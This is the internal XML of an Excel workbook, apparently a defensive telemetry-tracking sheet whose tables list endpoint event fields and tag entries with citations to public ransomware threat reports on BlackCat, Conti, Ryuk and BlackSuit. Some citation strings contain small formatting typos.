        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2023-01012&quot;, &quot;url&quot;: &quot;https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2023-12-19&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{  &quot;date&quot;: &quot;2021&quot;, &quot;url&quot;: &quot;https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/08/ryuks-return/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;, &quot;url&quot;: &quot;https://talosintelligence.com/resources/269&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;url&quot;: &quot;https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"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vey Wargo" refreshedDate="45778.569829282409" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{5CA93B16-8AF6-1046-BA3C-1426CD47B8CD}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table4"/>
  </cacheSource>
  <cacheFields count="10">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="file_action" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="file_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="file_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_file_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_file_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_cmdline" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="10" longText="1">
        <m/>
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-01&quot;: &quot;https://thedfirreport.com/2021/01/31/bazar-no-ryuk/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-06&quot;, &quot;url&quot;: &quot;https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;, &quot;cl0p&quot;, &quot;hive&quot;, &quot;ryuk&quot;, &quot;lockbit&quot;, &quot;blackbyte&quot;, &quot;blackcat&quot;, &quot;ragnarlocker&quot;]}" u="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vey Wargo" refreshedDate="45778.569829398148" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{2DA1FF8F-64C6-3E47-98A5-D101103E385C}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table3"/>
  </cacheSource>
  <cacheFields count="11">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="src_process" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="src_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="tgt_process" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="tgt_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="access" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="trace" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="object" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="7">
        <m/>
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>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vey Wargo" refreshedDate="45778.569829398148" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{FF071065-5305-A843-BC0E-8956AD2AA9CE}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="12">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="process_cmdline" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_cmdline" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="process_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="user_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="object" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="19" longText="1">
        <m/>
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{  &quot;date&quot;: &quot;2021&quot;, &quot;url&quot;: &quot;https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/08/ryuks-return/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-01&quot;: &quot;https://thedfirreport.com/2021/01/31/bazar-no-ryuk/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;, &quot;url&quot;: &quot;https://talosintelligence.com/resources/269&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;url&quot;: &quot;https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-06&quot;, &quot;url&quot;: &quot;https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;, &quot;cl0p&quot;, &quot;hive&quot;, &quot;ryuk&quot;, &quot;lockbit&quot;, &quot;blackbyte&quot;, &quot;blackcat&quot;, &quot;ragnarlocker&quot;]}"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m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>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m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>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m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>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m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>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651AB4-6668-E04C-AE05-A469DFE9C74D}"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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="12">
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="20">
        <item m="1" x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item m="1" x="4"/>
        <item m="1" x="5"/>
        <item m="1" x="6"/>
        <item m="1" x="7"/>
        <item m="1" x="8"/>
        <item m="1" x="9"/>
        <item m="1" x="10"/>
        <item m="1" x="11"/>
        <item m="1" x="12"/>
        <item m="1" x="13"/>
        <item m="1" x="14"/>
        <item m="1" x="15"/>
        <item m="1" x="16"/>
        <item m="1" x="17"/>
        <item x="0"/>
        <item m="1" x="18"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="11"/>
  </rowFields>
  <rowItems count="2">
    <i>
      <x v="17"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="-2"/>
  </colFields>
  <colItems count="2">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
  </colItems>
  <dataFields count="2">
    <dataField name="Count of delta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_e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23DE75-AE98-E44F-BAB0-EBEF926044F6}"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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="11">
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="8">
        <item m="1" x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item m="1" x="4"/>
        <item m="1" x="5"/>
        <item m="1" x="6"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="10"/>
  </rowFields>
  <rowItems count="2">
    <i>
      <x v="6"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="-2"/>
  </colFields>
  <colItems count="2">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
  </colItems>
  <dataFields count="2">
    <dataField name="Count of delta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_e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1E2462-842F-E848-A822-99B1A4557465}"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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="10">
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="11">
        <item m="1" x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item m="1" x="4"/>
        <item m="1" x="5"/>
        <item m="1" x="6"/>
        <item m="1" x="7"/>
        <item m="1" x="8"/>
        <item m="1" x="9"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="9"/>
  </rowFields>
  <rowItems count="2">
    <i>
      <x v="9"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="-2"/>
  </colFields>
  <colItems count="2">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
  </colItems>
  <dataFields count="2">
    <dataField name="Count of delta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_e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2A2247-37C7-B146-8C14-B1A4D372E94E}"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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="8">
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="20">
        <item m="1" x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item m="1" x="4"/>
        <item m="1" x="5"/>
        <item m="1" x="6"/>
        <item m="1" x="7"/>
        <item m="1" x="8"/>
        <item m="1" x="9"/>
        <item m="1" x="10"/>
        <item m="1" x="11"/>
        <item m="1" x="12"/>
        <item m="1" x="13"/>
        <item m="1" x="14"/>
        <item m="1" x="15"/>
        <item m="1" x="16"/>
        <item m="1" x="17"/>
        <item m="1" x="18"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="7"/>
  </rowFields>
  <rowItems count="2">
    <i>
      <x v="18"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="-2"/>
  </colFields>
  <colItems count="2">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
  </colItems>
  <dataFields count="2">
    <dataField name="Count of delta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_e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B8DB85-BB20-8546-B15A-D0F5310E33C2}" name="Table1" displayName="Table1" ref="A1:L139" totalsRowShown="0" headerRowDxfId="20">
  <autoFilter ref="A1:L139" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
  <tableColumns count="12">
    <tableColumn id="1" xr3:uid="{23FD2D36-2698-2541-9FC1-93976DA52D32}" name="delta_eid"/>
    <tableColumn id="5" xr3:uid="{A6AFA2D3-A50F-2F4E-9A4A-D6153D42841B}" name="delta_pid"/>
    <tableColumn id="15" xr3:uid="{247E4813-26D9-A443-B5DA-8FC7A1D2F8C4}" name="description" dataDxfId="19"/>
    <tableColumn id="6" xr3:uid="{CF28C46E-02F7-6C46-AFC2-39368AC338E7}" name="process_cmdline" dataDxfId="18"/>
    <tableColumn id="7" xr3:uid="{BBA3C39C-E28D-CE4E-8522-1B64FD909BC1}" name="initiating_process_cmdline" dataDxfId="17"/>
    <tableColumn id="8" xr3:uid="{B54F79EF-DF49-304C-B68A-284009C06F8F}" name="process_name"/>
    <tableColumn id="9" xr3:uid="{77731B4F-413A-9A48-9E34-761BA28F57CC}" name="initiating_process_name"/>
    <tableColumn id="10" xr3:uid="{D14102FB-89EB-6E41-B3EA-523646DB8A53}" name="process_path"/>
    <tableColumn id="11" xr3:uid="{D06C5568-EEDD-0B40-B52A-8462826FD229}" name="initiating_process_path" dataDxfId="16"/>
    <tableColumn id="12" xr3:uid="{B696AE98-F833-4348-8A2A-083681C93892}" name="process_account"/>
    <tableColumn id="13" xr3:uid="{DEC979B5-A396-F945-A221-01278C4EA968}" name="object"/>
    <tableColumn id="14" xr3:uid="{768D574A-4DC6-E84B-8CD2-121E544083BD}" name="ns_meta" dataDxfId="15"/>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691767E-9B37-6F40-A879-7D79A46E2FC0}" name="Table3" displayName="Table3" ref="A1:K2" totalsRowShown="0" headerRowDxfId="14">
  <autoFilter ref="A1:K2" xr:uid="{B691767E-9B37-6F40-A879-7D79A46E2FC0}"/>
  <tableColumns count="11">
    <tableColumn id="1" xr3:uid="{9CC347AC-2EB7-4844-9DCC-2D3947970D7D}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{A2C10F91-AEBB-204D-AA7A-4BD44A3088EC}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{E6DAEA44-04AE-5C43-938C-979ACA094309}" name="description"/>
    <tableColumn id="4" xr3:uid="{5B9D0866-78F7-F04A-9697-B4C5D044C193}" name="src_process"/>
    <tableColumn id="5" xr3:uid="{F65B41E9-C12A-AA42-872C-83D8CD484BF2}" name="src_process_path"/>
    <tableColumn id="6" xr3:uid="{68F0DA7C-3D7A-AF46-B179-705EA84876FE}" name="tgt_process"/>
    <tableColumn id="7" xr3:uid="{7661EFBB-2131-E049-A03C-4805D903A11C}" name="tgt_process_path"/>
    <tableColumn id="8" xr3:uid="{5D5F235C-5D0A-E744-A587-C1B16BB0EA3C}" name="access"/>
    <tableColumn id="9" xr3:uid="{E2695563-809E-1C49-B36B-E43A11773A0D}" name="trace" dataDxfId="13"/>
    <tableColumn id="10" xr3:uid="{E66E289A-5BBC-F340-81B0-F06A02B68D20}" name="object"/>
    <tableColumn id="11" xr3:uid="{D76B9915-0E46-0548-A0AE-618FC8904C88}" name="ns_meta"/>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77CD816-F5BF-BE44-BD53-B9C4C733495A}" name="Table4" displayName="Table4" ref="A1:J2" totalsRowShown="0" headerRowDxfId="12">
  <autoFilter ref="A1:J2" xr:uid="{B77CD816-F5BF-BE44-BD53-B9C4C733495A}"/>
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{B24795E5-2C6E-4748-AD2D-1DC71F2AF288}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{33F5232A-B7BF-F14B-BD7A-13CECBD925D9}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{9E03E42D-E38B-164F-BFA7-FAC09CC1DDF3}" name="description" dataDxfId="11"/>
    <tableColumn id="4" xr3:uid="{593E9916-B818-E948-9CB0-FF14679B05EF}" name="file_action"/>
    <tableColumn id="5" xr3:uid="{130E5943-D692-AB4C-A424-2D854D4233D6}" name="file_path" dataDxfId="10"/>
    <tableColumn id="6" xr3:uid="{BBE5D2E3-600B-604D-865B-216FEB63BCA8}" name="file_name"/>
    <tableColumn id="8" xr3:uid="{67CF967E-B942-1343-982D-3F3AC279792C}" name="initiating_file_name"/>
    <tableColumn id="10" xr3:uid="{009C8C85-1DB3-CA41-A598-D705567CF9E6}" name="initiating_file_path" dataDxfId="9"/>
    <tableColumn id="9" xr3:uid="{1A0C9476-9A86-4345-83E8-F78D68CAF12D}" name="initiating_process_cmdline"/>
    <tableColumn id="7" xr3:uid="{EAFC1214-BD94-664A-9D61-770E0E756BB2}" name="ns_meta"/>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F25077-4C33-3A4F-AB0F-6346C869CC52}" name="Table2" displayName="Table2" ref="A1:I2" totalsRowShown="0" headerRowDxfId="8">
  <autoFilter ref="A1:I2" xr:uid="{2CF25077-4C33-3A4F-AB0F-6346C869CC52}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{D47FC678-9D9E-7142-9E29-50D965E4A3E1}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{D9097B06-2D08-1542-B2BA-45338201E4B5}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{CB3DCBC8-427A-4640-9FFA-C3FCE37ECB64}" name="description"/>
    <tableColumn id="4" xr3:uid="{6EA6C73A-FC06-3C4A-9350-C24C0FF8E810}" name="logon_type"/>
    <tableColumn id="5" xr3:uid="{C26DF8BA-E242-0046-9309-5516D51DE832}" name="logon_process_name"/>
    <tableColumn id="8" xr3:uid="{88EA73D0-60AD-CA41-B418-053390C3E8E5}" name="sub_account"/>
    <tableColumn id="10" xr3:uid="{3DE16B9C-6202-6D4E-A50A-5E11E517BE53}" name="sub_sid"/>
    <tableColumn id="6" xr3:uid="{A8984B64-D8EB-604B-BBE4-BD34412345C5}" name="data_object"/>
    <tableColumn id="7" xr3:uid="{797C1A2D-A29C-0F4F-833F-AD6EF99D8BDD}" name="ns_meta"/>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64EA689-2FC8-3141-9A8F-1EF0AB31C6B0}" name="Table7" displayName="Table7" ref="A1:I2" totalsRowShown="0" headerRowDxfId="7">
